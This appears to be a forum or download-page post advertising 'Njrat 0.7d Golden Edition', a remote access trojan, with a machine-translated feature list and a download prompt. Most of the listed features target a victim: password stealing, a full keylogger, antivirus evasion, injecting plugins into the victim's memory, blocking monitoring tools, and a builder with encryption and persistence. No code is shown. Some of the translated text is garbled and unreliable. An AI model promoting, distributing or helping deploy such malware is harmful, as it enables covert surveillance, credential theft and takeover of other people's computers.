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Njrat 0.7d Golden Edition 2017

Hello guys give you Njrat 7 enhanced program fully characteristics and the reforms that have been added:
- has been improved desktop imaging
- has been challenged Plogn pull Albaswordat
- were added to bring the anti Alantveros name
- the property has been added to open a Web page in the victim's property device
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- has added fun feature to play the victim by:
- open / close CD
- Turn on / off Monitor
- heart buttons mouse control
- change the desktop background
- converting text to voice
- Adhar scary pages
- reboot / extinguish the victim's computer
- hide / show taskbar
- msgbox send messages in various forms
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- was renovated Alsuchit key
- have been challenged Plogn chat
- property send Plguin send plugins and injected into the victim's computer memory
- Anti property Process prevent the victim from the operation of communications monitoring and control programs
-albrosis metal processing hacker program
- it was rebuilt and became fully Kilogr record everything
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- has to rebuild the server again and Albildir also make it depends Al Mono.cecil library with encryption and hostmask automatically Bort and choose the server name in the Asattart August and your registry, and they discovered the rest for yourselves
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Regards Hassan Amiri
*Above is google transalte from Arabic Language

DOWNLOAD Njrat 0.7d Golden Edition